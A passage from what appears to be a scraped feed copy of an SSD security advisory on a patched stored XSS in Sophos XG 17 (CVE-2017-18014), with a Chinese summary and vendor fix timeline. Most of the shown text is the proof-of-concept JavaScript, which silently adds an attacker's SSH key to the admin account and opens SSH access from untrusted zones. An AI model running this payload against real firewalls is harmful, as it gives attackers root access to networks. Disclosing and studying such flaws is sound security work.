<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-11\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-12\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-13\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-14\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-15\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid2&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-16\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-17\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-18\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">location<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-19\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-20\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-21\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;=&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-22\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-23\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-24\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-25\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-26\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-27\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-28\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-29\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-35\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-36\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-37\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-38\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=72&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-39\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-40\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-41\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-42\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-43\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid2&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-49\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-50\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0122 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3645\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:52:38 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Sophos XG 17\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2a\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6root\u8bbf\u95ee\u3002 Sophos XG\u9632\u706b\u5899\u201c\u5168\u65b0\u7684\u63a7\u5236\u4e2d\u5fc3\u4e3a\u7528\u6237\u7684\u7f51\u7edc\u63d0\u4f9b\u524d\u6240\u672a\u6709\u7684\u53ef\u89c6\u6027\u3002\u53ef\u4ee5\u83b7\u5f97\u4e30\u5bcc\u7684\u62a5\u544a\uff0c\u8fd8\u53ef\u4ee5\u6dfb\u52a0Sophos iView\uff0c\u4ee5\u4fbf\u8de8\u591a\u4e2a\u9632\u706b\u5899\u8fdb\u884c\u96c6\u4e2d\u62a5\u544a\u3002\u201c \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e \u5382\u5546\u54cd\u5e94 Sophos\u5df2\u88ab\u544a\u77e5\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4ed6\u4eec\u7684\u56de\u5e94\u662f\uff1a 12\u670811\u65e5\uff0c\u6211\u4eec\u6536\u5230\u5e76\u786e\u8ba4\u60a8\u63d0\u4ea4\u7684\u95ee\u9898 12\u670812\u65e5\uff0c\u6211\u4eec\u786e\u8ba4\u4e86\u8fd9\u4e2a\u95ee\u9898\uff0c\u5e76\u5f00\u59cb\u8fdb\u884c\u4fee\u590d 12\u670820\u65e5\uff0c\u6211\u4eec\u53d1\u5e03\u4e86XGv17 MR3\u7684\u5b98\u65b9\u4fee\u590d\uff1ahttps\uff1ahttps:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released 12\u670829\u65e5\uff0c\u6211\u4eec\u5b8c\u6210\u4e86\u5bf9\u4e4b\u524d\u53d1\u5e03\u7684XGv16\uff0cv16.5\uff0cv17\u7248\u672c\u7684\u4fee\u590d 12\u670831\u65e5\uff0c\u6211\u4eec\u6839\u636e\u60a8\u7684\u8981\u6c42\u53d1\u5e03\u4e86\u6211\u4eec\u7684\u5b89\u5168\u516c\u544a\uff1ahttps:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053 CVE\uff1aCVE-2017-18014 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u7528\u6237\u53ef\u4ee5\u5728webadmin\u754c\u9762\u4e2d\u7684WAF\u65e5\u5fd7\u9875\u9762\uff08\u63a7\u5236\u4e2d\u5fc3 &#8211; >\u65e5\u5fd7\u6d4f\u89c8\u5668 &#8211; >\uff0c\u5728\u8fc7\u6ee4\u5668\u9009\u9879\u201cWeb\u670d\u52a1\u5668\u4fdd\u62a4\u201d\u4e2d\uff09\u4e2d\u89e6\u53d1\u5b58\u50a8\u578bXSS\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u53ef\u6267\u884c\u9632\u706b\u5899webadmin \u53ef\u4ee5\u6267\u884c\u7684\u4efb\u4f55\u52a8\u4f5c\uff08\u521b\u5efa\u65b0\u7684\u7528\u6237\/ \u542f\u7528ssh\u548c\u6dfb\u52a0ssh\u6388\u6743\u5bc6\u94a5\u7b49\uff09\u3002 \u4e3a\u4e86\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u6211\u4eec\u5c06\u6f14\u793a\u4ee5\u4e0b\u573a\u666f\uff1a Sophos XG Firewall\u914d\u7f6e3\u4e2a\u533a\u57df\uff1aTrusted\uff0cUntrusted\uff0cDMZ WEB\u670d\u52a1\u5668\u88ab\u653e\u7f6e\u5728DMZ\u4e2d \u9632\u706b\u5899\u4f7f\u7528Sophos\u63a8\u8350\u7684\u9ed8\u8ba4Web\u5e94\u7528\u9632\u706b\u5899\uff08WAF\uff09\u4fdd\u62a4Web\u670d\u52a1\u5668\u3002 \u6765\u81eaUntrusted\u7f51\u7edc\u7684\u653b\u51fb\u8005\u5411DMZ\u4e2d\u7684Web\u670d\u52a1\u5668\u53d1\u9001URL\u8bf7\u6c42\uff0c\u9020\u6210\u5230\u811a\u672c\u6ce8\u5165WAF\u65e5\u5fd7\u9875\u9762 \u6765\u81eaTrusted\u7684\u7ba1\u7406\u5458\u8bbf\u95eeWAF\u65e5\u5fd7\u9875\u9762 \u6ca1\u6709\u4efb\u4f55\u5176\u4ed6\u4ea4\u4e92\u6216\u8b66\u544a\uff0c\u811a\u672c\u5411\u7ba1\u7406\u7528\u6237\u6dfb\u52a0\u4e00\u4e2aSSH\u6388\u6743\u5bc6\u94a5\uff0c\u5e76\u5141\u8bb8\u6765\u81eaUntrusted\u7684ssh\u7ba1\u7406\u3002 \u653b\u51fb\u8005\u83b7\u5f97\u5b8c\u6574\u7684root ssh shell Sophos XG WAF\u65e5\u5fd7\u9875\u9762\u5c06\u6267\u884cPOST\u8bf7\u6c42\u4e2d\u201cUser-Agent\u201d\u53c2\u6570\u3002 \u6f0f\u6d1e\u8bc1\u660e Sophos XG\u914d\u7f6e: 